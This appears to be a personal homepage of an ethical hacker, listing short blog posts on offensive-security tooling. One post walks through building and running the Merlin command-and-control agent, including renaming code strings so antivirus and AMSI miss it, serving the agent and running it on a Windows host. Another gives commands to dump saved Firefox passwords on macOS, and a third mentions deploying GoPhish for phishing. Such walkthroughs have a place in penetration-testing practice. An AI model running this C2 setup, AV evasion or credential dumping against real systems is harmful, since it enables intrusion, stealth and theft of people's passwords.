Hi there, my name is Joost van ‘t Zand. This page serves as a bit of an overview of me and my online presence. I am currently working as a ethical hacker.
Blog posts
C2 Using Merlin
To use Merlin as a Command & Control server, which is written in golang, we should take the following steps:
go version -> version should be 1.13 or higher apt update && sudo apt install golang-go git clone https://github.com/Ne0nd0g/merlin && cd merlin ## Now replace ExecuteShell for MiniMice to trick virusscanners and AMSI ## and also hide Ne0nd0g for AMSI, as this is the developer find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/ExecuteShell/MiniMice/g' find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/executeShell/miniMice/g' find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g' sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g' go.mod ## Create an output directory and build the Merlin agent make agent-windows DIR="./output" ## Start the Merlin server listener go run cmd/merlinserver/main.go -i -p 8443 -psk strongPassphraseWhaterYouWant ## Run a python HTTP Server to copy the Merlin agent to the Windows system cd /mnt/tools/merlin/output/ python -m SimpleHTTPServer 80 ## Run the Merlin agent on the Windows host merlinAgent-Windows-x64.exe -url -psk strongPassphraseWhaterYouWant [+]New authenticated agent checkin for a0c86f61-4f21-4e63-9856-b73d7b8fbf3a ## Now we can interact with the agent: interact a0c86f61-4f21-4e63-9856-b73d7b8fbf3a help ls info cmd whoami
Deploying Gophish In Docker With Terraform And Aws
Here a video about how to deploy GoPhish in a Docker container on a VPS in AWS which is deployed using TerraForm
Dump Firefox Credentials On Macos
Dumping the credentials stored in the Firefox browser cache on MacOS is possible using the following commands:
git clone https://github.com/unode/firefox_decrypt cd firefox_decrypt python firefox_decrypt.py Select the Firefox profile you wish to decrypt 1 -> Profiles/1v42l6gf.dev-edition-default 2 -> Profiles/cunynfjm.default 2 Master Password for profile /Users/myuser/Library/Application Support/Firefox/Profiles/cunynfjm.default: 2019-11-11 14:13:18,813 - WARNING - Attempting decryption with no Master Password Website: https://www.hackthebox.eu Username: '<username>' Password: '******' Website: http://webmail.mijndomein.nl Username: '<username>' Password: '******' Website: https://www.t-mobile.nl Username: '<username>' Password: '******'
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